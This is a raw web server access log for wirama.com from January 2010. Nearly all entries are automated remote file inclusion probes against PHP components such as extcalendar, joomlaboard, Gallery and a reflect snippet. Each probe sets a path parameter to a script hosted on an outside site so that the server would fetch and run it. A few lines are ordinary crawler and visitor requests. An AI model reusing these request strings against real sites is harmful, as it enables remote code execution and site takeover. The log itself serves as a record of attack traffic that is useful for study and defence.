61.47.7.71 - - [01/Jan/2010:11:01:37 -0800] "GET /logs/access_090501.log%20%20//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:11:02:14 -0800] "GET /logs/access_090801.log//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:21 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:21 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:21 -0800] "GET /logs/access_090501.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:28 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:28 -0800] "GET /logs/access_090401.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:28 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:50 -0800] "GET /logs/access_091101.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:50 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:50 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:03:50 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:05:44 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:05:44 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:05:44 -0800] "GET /logs/access_090401.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:08:04 -0800] "GET /logs/access_091031.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:09:18 -0800] "GET /logs/access_091001.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:09:18 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:09:21 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:12:32 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:12:32 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:12:32 -0800] "GET /logs/access_090731.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.80.193.43 - - [01/Jan/2010:11:15:12 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:15:57 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:15:57 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:15:57 -0800] "GET /logs/access_091101.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:18:35 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:18:35 -0800] "GET /logs/access_090731.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:18:43 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:20:04 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:20:09 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:20:09 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:20:33 -0800] "GET /logs/access_090601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:22:03 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:22:03 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:22:03 -0800] "GET /logs/access_090701.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:22:19 -0800] "GET /logs/access_091031.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:22:27 -0800] "GET /logs/access_090731.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:04 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:09 -0800] "GET /logs/access_091101.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:09 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:21 -0800] "GET /logs/access_090731.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:41 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:41 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:50 -0800] "GET /logs/access_091031.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:24:50 -0800] "GET /logs/access_090401.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.46.199.200 - - [01/Jan/2010:11:25:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:25:56 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:25:56 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:25:56 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:30:10 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:30:10 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:30:10 -0800] "GET /logs/access_090401.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.93.208.12 - - [01/Jan/2010:11:30:22 -0800] "GET /logs/access_090701.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:11:30:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:11:30:22 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:23 -0800] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:23 -0800] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:23 -0800] "GET /logs/access_090330.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:23 -0800] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:23 -0800] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:23 -0800] "GET /logs/access_090330.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:24 -0800] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:24 -0800] "GET /logs/access_090330.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:24 -0800] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:28 -0800] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:28 -0800] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.94.125.100 - - [01/Jan/2010:11:31:28 -0800] "GET /logs/access_090330.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.hd-win.com/articles/tmp/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:32:17 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:32:17 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:32:17 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:32:39 -0800] "GET /logs/access_091101.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:34:23 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:34:23 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:34:23 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.46.199.200 - - [01/Jan/2010:11:35:58 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.229 - - [01/Jan/2010:11:39:55 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.229 - - [01/Jan/2010:11:40:44 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:42:32 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:42:32 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:42:32 -0800] "GET /logs/access_090401.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:11:43:11 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:43:11 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:43:11 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:43:27 -0800] "GET /logs/access_091031.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.17.250 - - [01/Jan/2010:11:44:00 -0800] "GET /logs/access_091031.log////?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:11:44:00 -0800] "GET ///?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:11:44:00 -0800] "GET /logs////?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:46:46 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:46:46 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:46:46 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:46:46 -0800] "GET /logs/access_090701.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:46:46 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:46:51 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:11:48:17 -0800] "GET /logs/access_091101.log//?_SERVER[DOCUMENT_ROOT]=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:11:48:17 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.realtyicons.com/1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:11:48:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.realtyicons.com/1.txt?? HTTP/1.1" 200 3803 "-" "Mozilla/5.0" "wirama.com"
195.205.252.4 - - [01/Jan/2010:11:49:24 -0800] "GET /logs/access_090301.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.205.252.4 - - [01/Jan/2010:11:49:24 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.205.252.4 - - [01/Jan/2010:11:49:24 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:11:49:45 -0800] "GET /logs/access_091031.log//?_SERVER[DOCUMENT_ROOT]=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.51.115 - - [01/Jan/2010:11:52:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:53:24 -0800] "GET /logs/access_090601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.19.61.172 - - [01/Jan/2010:11:54:36 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.com/search?hl=es&client=iceweasel-a&rls=org.debian:es-ES:unofficial&q=http://search.msn.com/msnbot.htm&start=10&sa=N" "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.13) Gecko/2009082121 Iceweasel/3.0.7 (VENENUX 0.8)" "www.wirama.com"
190.19.61.172 - - [01/Jan/2010:11:54:37 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.13) Gecko/2009082121 Iceweasel/3.0.7 (VENENUX 0.8)" "www.wirama.com"
190.19.61.172 - - [01/Jan/2010:11:54:40 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.13) Gecko/2009082121 Iceweasel/3.0.7 (VENENUX 0.8)" "www.wirama.com"
190.19.61.172 - - [01/Jan/2010:11:54:40 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.13) Gecko/2009082121 Iceweasel/3.0.7 (VENENUX 0.8)" "www.wirama.com"
65.55.51.115 - - [01/Jan/2010:11:55:28 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:56:25 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:56:25 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:56:25 -0800] "GET /logs/access_090801.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:57:02 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:11:57:02 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
